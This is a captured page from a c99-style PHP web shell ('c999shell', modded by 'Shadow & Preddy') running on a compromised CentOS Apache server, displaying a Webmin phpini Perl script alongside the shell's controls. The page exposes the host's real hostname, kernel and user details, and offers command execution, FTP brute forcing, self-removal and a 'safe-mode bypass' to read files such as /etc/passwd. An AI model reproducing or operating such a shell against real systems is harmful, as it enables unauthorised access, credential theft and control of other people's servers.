!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/phpini/   drwxr-xr-x
Free 50.93 GB of 127.8 GB (39.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.cgi (1.74 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Show all editable PHP configuration files

require './phpini-lib.pl';

# Get editable files
@files = &list_php_configs();
if (!@files) {
    # User doesn't have access to any
    &ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1);
    &ui_print_endpage($text{'index_eaccess'});
    }
@files = grep { -r $_->[0] } @files;
if (!@files) {
    &ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1);
    if ($access{'noconfig'}) {
        &ui_print_endpage($text{'index_efiles'});
        }
    else {
        &ui_print_endpage(&text('index_efiles2',
                    "../config.cgi?$module_name"));
        }
    }

if (@files == 1 && !$access{'anyfile'} && $access{'noconfig'}) {
    # Just re-direct to the one file
    &redirect("list_ini.cgi?file=".&urlize($files[0]->[0]));
    }
else {
    # Show a table of config files
    &ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1);

    @tds = ( undef, undef, "width=10% nowrap" );
    print &ui_columns_start([ $text{'index_file'},
                  $text{'index_desc'},
                  $text{'index_actions'} ],
                100, 0, \@tds);
    foreach $f (@files) {
        local @acts = ( "<a href='list_ini.cgi?file=".
                &urlize($f->[0])."'>$text{'index_edit'}</a>" );
        if ($access{'manual'}) {
            push(@acts, "<a href='edit_manual.cgi?file=".
                &urlize($f->[0])."'>$text{'index_manual'}</a>");
            }
        print &ui_columns_row([
            "<tt>$f->[0]</tt>",
            $f->[1],
            join(" | ", @acts)
            ], \@tds);
        }
    print &ui_columns_end();

    # Allow entering a file to edit
    if ($access{'anyfile'}) {
        print "<p>\n";
        print &ui_form_start("list_ini.cgi");
        print "<b>$text{'index_anyfile'}</b>\n";
        print &ui_textbox("file", undef, 40)." ".
              &file_chooser_button("file")." ".
              &ui_submit($text{'index_edit'})."\n";
        print &ui_form_end();
        }

    &ui_print_footer("/", $text{'index'});
    }


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0165 ]--